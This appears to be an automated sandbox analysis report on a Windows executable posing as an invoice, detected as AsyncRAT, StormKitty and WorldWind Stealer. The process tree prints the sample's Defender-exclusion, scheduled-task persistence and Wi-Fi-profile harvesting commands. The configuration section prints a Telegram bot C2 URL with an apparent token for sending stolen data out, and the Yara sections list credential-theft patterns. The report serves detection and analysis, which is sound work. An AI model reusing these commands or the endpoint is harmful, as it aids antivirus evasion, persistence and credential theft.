Edit tour

Windows Analysis Report
Invoice-BL. Payment TT $ 28,945.99.exe

Overview

General Information

Sample name:	Invoice-BL. Payment TT $ 28,945.99.exe
Analysis ID:	1582796
MD5:	54dbe54846a05d5a1677a5ab2970bd6a
SHA1:	4ea5792f72f540c58a54f5cfce9de19eb05ffaaa
SHA256:	53965f472183c0e8ec94202b3ba0716faf8e095e073a688f3396c4b8dcca6f30
Tags:	AsyncRATexeuser-julianmckein
Infos:

Detection

AsyncRAT, StormKitty, WorldWind Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Capture Wi-Fi password

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected StormKitty Stealer

Yara detected Telegram RAT

Yara detected WorldWind Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal WLAN passwords

Tries to harvest and steal browser information (history, passwords, etc)

Uses netsh to modify the Windows network and firewall settings

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious desktop.ini Action

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Invoice-BL. Payment TT $ 28,945.99.exe (PID: 3848 cmdline: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe" MD5: 54DBE54846A05D5A1677A5AB2970BD6A)

powershell.exe (PID: 3716 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7368 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp532A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Invoice-BL. Payment TT $ 28,945.99.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe" MD5: 54DBE54846A05D5A1677A5AB2970BD6A)

cmd.exe (PID: 7748 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7796 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7816 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7824 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7880 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7924 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7940 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

SFHAWxtoIpgL.exe (PID: 7308 cmdline: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe MD5: 54DBE54846A05D5A1677A5AB2970BD6A)

schtasks.exe (PID: 7564 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SFHAWxtoIpgL" /XML "C:\Users\user\AppData\Local\Temp\tmp73B2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SFHAWxtoIpgL.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe" MD5: 54DBE54846A05D5A1677A5AB2970BD6A)

cmd.exe (PID: 8152 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7224 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7188 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

findstr.exe (PID: 7204 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 792 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3848 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)

netsh.exe (PID: 7184 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6331768257:AAE1Rrc3F4A-nTJkfXEukNBriTate8i72L8/sendMessage"}

Threatname: AsyncRAT

{"Server": "127.0.0.1", "Ports": "6606,7707,8808"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x293aa:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2592b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x8ee2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x5463:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000000B.00000002.4114120570.0000000000420000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x541ea:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x5076b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x34694:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x29a72:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x55692:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x25ff3:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x51c13:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2d9b6b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x30558b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x36fb4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x584f8:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x7e100:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x57016:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x7cc1e:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1371b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x13224:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM 0x5d778:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: SFHAWxtoIpgL.exe PID: 7308	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x11d42:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x5c296:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	JoeSecurity_WorldWindStealer	Yara detected WorldWind Stealer	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x108c3:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Process Memory Space: SFHAWxtoIpgL.exe PID: 7620	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xf3c6:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x2c775:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Click to see the 58 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x10183:$sk01: LimerBoy/StormKitty 0x269ce:$sk01: LimerBoy/StormKitty 0x1ba79:$str01: set_sUsername 0x1bbff:$str02: set_sIsSecure 0x1bcdd:$str03: set_sExpMonth 0x1a12c:$str04: WritePasswords 0x1abcb:$str05: WriteCookies 0x1be8d:$str06: sChromiumPswPaths 0x1be9f:$str07: sGeckoBrowserPaths 0x22ca1:$str08: Username: {1} 0x23e49:$str08: Username: {1} 0x22cbd:$str09: Password: {2} 0x23e65:$str09: Password: {2} 0x24f7f:$str10: encrypted_key":"(.*?)"
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1d6c9:$str01: get_ActivatePong 0x1d5ee:$str02: get_SslClient 0x1d5d2:$str03: get_TcpClient 0x1d690:$str04: get_SendSync 0x1d670:$str05: get_IsConnected 0x1c131:$str06: set_UseShellExecute 0x27478:$str07: Pastebin 0x2146b:$str08: Select * from AntivirusProduct 0x27352:$str10: timeout 3 > NUL 0x27250:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x272e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x272e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x23863:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x2593f:$s1: \VPN\NordVPN 0x25925:$s2: \VPN\OpenVPN 0x25907:$s3: \VPN\ProtonVPN
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x2409b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x2410d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x24197:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x24229:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x24293:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x24305:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x2439b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x2442b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1018c:$x3: StormKitty 0x198ca:$s1: GetBSSID 0x197ca:$s2: GetAntivirus 0x24d4b:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x24f7d:$s6: "encrypted_key":"(.*?)"
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x11f83:$sk01: LimerBoy/StormKitty 0x287ce:$sk01: LimerBoy/StormKitty 0x1d879:$str01: set_sUsername 0x1d9ff:$str02: set_sIsSecure 0x1dadd:$str03: set_sExpMonth 0x1bf2c:$str04: WritePasswords 0x1c9cb:$str05: WriteCookies 0x1dc8d:$str06: sChromiumPswPaths 0x1dc9f:$str07: sGeckoBrowserPaths 0x24aa1:$str08: Username: {1} 0x25c49:$str08: Username: {1} 0x24abd:$str09: Password: {2} 0x25c65:$str09: Password: {2} 0x26d7f:$str10: encrypted_key":"(.*?)"
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	rat_win_asyncrat	Detect AsyncRAT based on specific strings	Sekoia.io	0x1f4c9:$str01: get_ActivatePong 0x1f3ee:$str02: get_SslClient 0x1f3d2:$str03: get_TcpClient 0x1f490:$str04: get_SendSync 0x1f470:$str05: get_IsConnected 0x1df31:$str06: set_UseShellExecute 0x29278:$str07: Pastebin 0x2326b:$str08: Select * from AntivirusProduct 0x29152:$str10: timeout 3 > NUL 0x29050:$str11: /c schtasks /create /f /sc onlogon /rl highest /tn 0x290e0:$str12: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse	Detects file containing reversed ASEP Autorun registry keys	ditekSHen	0x290e2:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
